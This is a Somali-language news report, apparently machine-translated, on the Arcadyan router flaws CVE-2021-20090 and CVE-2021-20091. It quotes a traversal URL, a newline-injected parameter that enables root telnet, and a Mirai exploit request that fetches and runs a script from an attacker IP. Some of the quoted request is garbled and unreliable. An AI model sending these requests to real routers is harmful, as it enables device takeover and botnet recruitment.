Weerar aad u weyn ayaa laga duubay shabakada ka dhanka ah router-yada guryaha kuwaas oo firmware-ka adeegsada hirgelinta HTTP server ka shirkadda Arcadyan. Si loo xakameeyo aaladaha, isku-darka laba dayacan ayaa la isticmaalaa taas oo u oggolaanaysa fulinta fog ee koodka sabab la'aanta ah ee xuquuqda xididka. Dhibaatadu waxay saamaysaa tiro balaadhan oo ah router ADSL ka Arcadyan, ASUS iyo Buffalo, iyo sidoo kale aaladaha lagu bixiyo noocyada Beeline (dhibaatada waxaa lagu xaqiijiyay Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone iyo hawlwadeenada kale ee isgaarsiinta. Waxaa la xusay in dhibaatadu ay ku jirtay Arcadyan firmware in ka badan 10 sano waxaana waqtigan ku guuleystay inuu u haajiro ugu yaraan 20 nooc oo qalab ah oo ka socda 17 warshadood oo kala duwan.
Nuglaanta koowaad, CVE-2021-20090, waxay suurtogal ka dhigaysaa in la galo qoraal kasta oo is-dhexgal shabakadeed la'aanteed. Nuxurka nuglaanta ayaa ah in interface-ka shabakadda, buug-tusaha qaarkood oo sawirada, faylasha CSS iyo qoraallada JavaScript la soo diro la heli karo iyada oo aan la hubin. Xaaladdan oo kale, hagayaasha gelitaanka la'aanteed la oggol yahay ayaa la hubiyaa iyadoo la isticmaalayo maaskarada bilowga ah. Sheegidda "../" jilayaasha waddooyinka si loo aado tusaha waalidka waxaa xannibay firmware-ka, laakiin adeegsiga isku-darka "..% 2f" waa la booday. Haddaba, waxaa suurtogal ah in la furo bogag la ilaaliyo marka la dirayo codsiyada sida "http://192.168.1.1/images/..%2findex.htm".
Nuglaanta labaad, CVE-2021-20091, waxay u ogolaataa isticmaale la xaqiijiyay inuu isbedel ku sameeyo habaynta nidaamka aaladda isagoo u diraya xaddidaadyo si gaar ah loo qaabeeyey qoraalka apply_abstract.cgi, kaas oo aan hubin joogitaanka jilaa khadka cusub ee xuduudaha . Tusaale ahaan, marka la samaynayo hawlgalka ping, weeraryahanku wuxuu cayimi karaa qiimaha "192.168.1.2%0AARC_SYS_TelnetdEnable=1" ee goobta ciwaanka IP-ga ee la hubiyay, iyo qoraalka, marka la abuurayo faylka dejinta /tmp/etc/config/ .glbcfg, waxay ku qori doontaa xariiqda βAARC_SYS_TelnetdEnable=1β, kaas oo shaqaysiiya seerfarka telnetd, kaas oo siinaya gelitaanka qolofka amar aan xadidnayn oo leh xuquuqaha xididka. Sidoo kale, adiga oo dejinaya cabbirka AARC_SYS, waxaad ku fulin kartaa kood kasta nidaamka. Nuglaanta koowaad waxay suurtogal ka dhigaysaa in la socodsiiyo qoraal dhibaato leh iyada oo aan la hubin iyada oo loo gelayo sida "/images/..%2fapply_abstract.cgi".
Si looga faa'iidaysto nuglaanta, weeraryahanku waa inuu awood u leeyahay inuu codsi u soo diro dekedda shabakadda kaas oo is-dhexgalka webku ku socdo. Marka la eego dhaqdhaqaaqa fidinta weerarka, hawl-wadeenno badan ayaa ka tagaya helitaanka qalabkooda shabakada dibadda si ay u fududeeyaan ogaanshaha dhibaatooyinka adeegga taageerada. Haddii gelitaanka interface-ku uu ku xaddidan yahay oo keliya shabakadda gudaha, weerar ayaa laga qaadi karaa shabakad dibadda ah iyadoo la adeegsanayo farsamada "DNS rebinding". Nuglaanta ayaa mar horeba si firfircoon loogu isticmaalay in lagu xidho router-yada Mirai botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: dhow User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7 0%1A ARC_SYS_TelnetdEnable=0&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Source: opennet.ru